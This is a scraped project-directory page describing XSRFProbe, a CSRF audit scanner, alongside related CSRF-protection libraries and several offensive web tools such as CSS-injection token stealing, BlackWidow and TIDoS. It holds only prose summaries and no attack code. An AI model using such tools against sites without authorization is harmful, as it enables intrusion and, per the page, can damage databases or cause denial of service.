XSRFProbe - An CSRF Scanner Equipped with Powerful Crawling Engine and Intelligent Token Generator.

  •        20

XSRF Probe is an advanced Cross Site Request Forgery Audit Toolkit equipped with Powerful Crawling and Intelligent Token Generation Capabilities. It is because this tool is designed to perform all kinds of form submissions automatically which can sabotage the site. Sometimes you may screw up the database and most probably perform a DoS on the site as well.




Related Projects

csrf - gorilla/csrf provides Cross Site Request Forgery (CSRF) prevention middleware for Go web applications & services

  •    Go

gorilla/csrf is also compatible with middleware 'helper' libraries like Alice and Negroni....and then collect the token with csrf.Token(r) in your handlers before passing it to the template, JSON body or HTTP header (see below).

nosurf - CSRF protection middleware for Go.

  •    Go

nosurf is an HTTP package for Go that helps you prevent Cross-Site Request Forgery attacks. It acts like a middleware and therefore is compatible with basically any Go HTTP application.Even though CSRF is a prominent vulnerability, Go's web-related package infrastructure mostly consists of micro-frameworks that neither do implement CSRF checks, nor should they.

csurf - CSRF token middleware

  •    Javascript

Node.js CSRF protection middleware. Requires either a session middleware or cookie-parser to be initialized first.

cssInjection - Stealing CSRF tokens with CSS injection (without iFrames)

  •    HTML

A post here details a method for stealing sensitive data with CSS injection by using Attribute Selectors and iFrames. Because this method requires iFrames, and most major websites disallow being framed, this attack isn't always practical. Here I'll detail here a way to do this without iFrames, effectively stealing a CSRF token in about 10 seconds.


  •    ASPNET

NeatHtml™ is a highly-portable open source website component that displays untrusted content securely, efficiently, and accessibly. Untrusted content is any content that is not trusted by the website owner (e.g. blog comments, forum posts, or user pages on social networks).

flask-wtf - Simple integration of Flask and WTForms, including CSRF, file upload and Recaptcha integration

  •    Python

Simple integration of Flask and WTForms, including CSRF, file upload, and reCAPTCHA.

xssor - XSSOR:方便XSS与CSRF的工具,http://evilcos.me/lab/xssor/

  •    Javascript


BlackWidow - A Python based web application scanner to gather OSINT and fuzz for OWASP vulnerabilities on a target website

  •    Python

BlackWidow is a python based web application spider to gather subdomains, URL's, dynamic parameters, email addresses and phone numbers from a target website. This project also includes Inject-X fuzzer to scan dynamic URL's for common OWASP vulnerabilities. This software is released under the GNU General Public License v3.0. See LICENSE.md for details.

IIS Secure Parameter Filter (SPF)


SPF is an application security module Microsoft IIS web servers. SPF provides instant out-of-the-box protection against Parameter Tampering, Cross-Site Scripting (XSS), URL Manipulation, Cross-Site Request Forgery (CSRF), and Session Hijacking/Replay attacks.


  •    Java

Java-based Open Source WAF (Web Application Firewall) to include inside a web application in order to protect it against attacks like SQL Injection, Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Parameter Manipulation and many more.


  •    Java

The move towards Single Page Apps and RESTful services open the doors to a much better way of securing web applications. Traditional web applications use browser cookies to identify a user when a request is made to the server. This approach is fundamentally flawed and causes many applications to be vulnerable to Cross-Site Request Forgery (CSRF) attacks. When used correctly, RESTful services can avoid this vulnerability altogether. Before we go into the solution, lets recap the problem. HTTP is a stateless protocol. Make a request and get a response. Make another request and get another response. There is no correlation (i.e. "state") between these requests. This poses a problem when you need to identify a user to the system because one request logs the user in and another request needs to tell the server who is making the request.


  •    PHP

Training and educating about the web security

Spock - Another Haskell web framework for rapid development

  •    Haskell

Since version Spock drops simple routing in favor of typesafe routing and drops safe actions in favor of the "usual" way of csrf protection with a token. Since version Spock supports typesafe routing. If you wish to continue using the untyped version of Spock you can Use Web.Spock.Simple. The implementation of the routing is implemented in a separate haskell package called reroute.

express-state - Share configuration and state data of an Express app with the client-side via JavaScript

  •    Javascript

Share configuration and state data of an Express app with the client-side via JavaScript. Express State is designed to make it easy to share configuration and state data from the server to the client. It can be used to share any data that needs to be available to the client-side JavaScript code of the an app: e.g., the current user, a CSRF token, model data, routes, etc.

WebSploit Framework


WebSploit Framework

TIDoS-Framework - The Offensive Manual Web Application Penetration Testing Framework.

  •    Python

NOTE: For installing globally, you will need to default your Python version to 2.x. However, the work of migration from Python2 to Python3 is already underway. TIDoS needs some libraries to run, which can be installed via aptitude or yum Package Managers.


  •    Python

Simple integration of Flask and WTForms, including CSRF, file upload and Recaptcha integration.



single-page php shopping cart script